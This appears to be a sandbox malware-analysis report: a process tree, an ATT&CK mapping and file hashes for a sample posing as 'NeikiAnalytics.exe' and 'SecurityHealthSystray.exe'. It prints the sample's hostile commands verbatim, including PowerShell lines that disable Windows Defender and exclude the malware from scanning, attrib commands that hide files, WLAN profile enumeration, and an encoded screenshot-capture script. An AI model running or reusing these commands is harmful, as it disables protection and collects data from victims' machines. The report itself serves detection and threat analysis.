PID 4600 wrote to memory of 4896	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 4896	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 1664	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	netsh.exe
PID 4600 wrote to memory of 1664	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	netsh.exe
PID 4600 wrote to memory of 4432	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 4432	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 4920	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4600 wrote to memory of 4920	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4920 wrote to memory of 660	4920	powershell.exe	csc.exe
PID 4920 wrote to memory of 660	4920	powershell.exe	csc.exe
PID 660 wrote to memory of 4512	660	csc.exe	cvtres.exe
PID 660 wrote to memory of 4512	660	csc.exe	cvtres.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

852 attrib.exe
2540 attrib.exe
4896 attrib.exe
4432 attrib.exe

pid	process
852	attrib.exe
2540	attrib.exe
4896	attrib.exe
4432	attrib.exe

C:\Users\Admin\AppData\Local\Temp\07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
2⤵
- Views/modifies file attributes
PID:852

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
2⤵
- Views/modifies file attributes
PID:2540

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3972

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
2⤵
PID:3992

C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
2⤵
PID:4504

C:\Windows\System32\Wbem\wmic.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
PID:3028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
2⤵
PID:1540

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4896

C:\Windows\system32\netsh.exe
netsh wlan show profiles
2⤵
PID:1664

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
2⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rehzqiqg\rehzqiqg.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67A3.tmp" "c:\Users\Admin\AppData\Local\Temp\rehzqiqg\CSC8BC27175161A4E798647383FF951F5A.TMP"
4⤵
PID:4512

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES67A3.tmp
Filesize
1KB

MD5
fee4b2965445dc7b060b3264f828bdc9

SHA1
031c81bf746b81b1753800fc9e92020bf669167c

SHA256
f84c51c69265f143d0d43563c232c137f869183d11f4582890b5a1049a023f3c

SHA512
c8699314d207daed07424979e8c20c0f1738f6aea15bdda863bf8bbdea110a8255c03ea7ad48617a7a8fde46ed306d8ff84624c758034ce4c647af73c9b5c788

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cace333v.six.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nUmEdzGmd2\Display (1).png
Filesize
413KB

MD5
002ab69d07fcd401a8fbb275376a6840

SHA1
0e99fb6f34dcf63377a908e8590d69ad7cc928b4

SHA256
55a47991748721c24e1f26ed29bf2b49575fe1ebd8dd24b8dd3220a9376a4392

SHA512
f5569fb039d7e52ac50e92164dbd7816d861e8329939ad80241451f6323155fc17089ed364913410cecd88de149f6d48b4d7002674a9ff339d121474bf897571

Download Submit
C:\Users\Admin\AppData\Local\Temp\rehzqiqg\rehzqiqg.dll
Filesize
4KB

MD5
9b4d0a61b8e28c1fa7d67c81846ff9e3

SHA1
2848004cc17102ef5f1af7b520f957296a5ddc6a

SHA256
b924221aaf40810a88f9895985904539836c543e99eed1fe439471ac2ca56742

SHA512
28f304ba3315f1f8e81f54f38a687917fee61df9871d04cc8b3eed052d816177329b66494088d8a48463b5f2cd046e975e8c3c99096cd7b4e04dd84aee79a3be

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Filesize
9.5MB

MD5
07509e7bfdeb2027d021b7f98539c040

SHA1
67603029c5b092bcc39fac5187d6f3cf93233cb6

SHA256
544e7e6b6893fa07a4fa3fa457a48723a8f51c404077a27bd25c736cf4df4fc7

SHA512
1081ffc6af19d6cef2f12b06b9afc73f85db620440d9ec623fcdf14bb35b5b1668e7ee59cf73081618ad9bc1be758ee673e97400b5e34961d1eeae2d76235790

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rehzqiqg\CSC8BC27175161A4E798647383FF951F5A.TMP
Filesize
652B

MD5
f7c7a383fffc4d0ef1348452258d3471

SHA1
391d40df41e00ed16ca8637d6f267fa1f8906ca2

SHA256
f79e7f0237fc6a669023a31a156a5df6b620a7dc2bca4eddd7a674c51456b950

SHA512
a3c699920565188263209f3c5a35a4ea15698a69e26399906e3380976c13393d15b2272a420df55e6874b1f96fee229c9155547a139d13af6a3b40c3f6845f26

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rehzqiqg\rehzqiqg.0.cs
Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rehzqiqg\rehzqiqg.cmdline
Filesize
607B

MD5
c5fdc8388a45ca05f6a86c2b9a6881ef

SHA1
bea6dea3cac2b9d0b72b16c1f3368172c3f843c3

SHA256
7e3cc0620bd1132f982cbfc2319c84d3e64798d691636ba7b5ef1b1d19aec7b0

SHA512
ecdf53f10502924454da214eda8eb9c928643b75a03595f5f8ef2158a5d18a0232521abb9d0b2247c5d209fadfb0e82af035b42d29c791fdd7670ed34a97d25f

Download Submit
memory/3972-9-0x0000026C02CA0000-0x0000026C02CC2000-memory.dmp

Filesize
136KB

Download
memory/4920-67-0x000001F66DD80000-0x000001F66DD88000-memory.dmp

Filesize
32KB

Download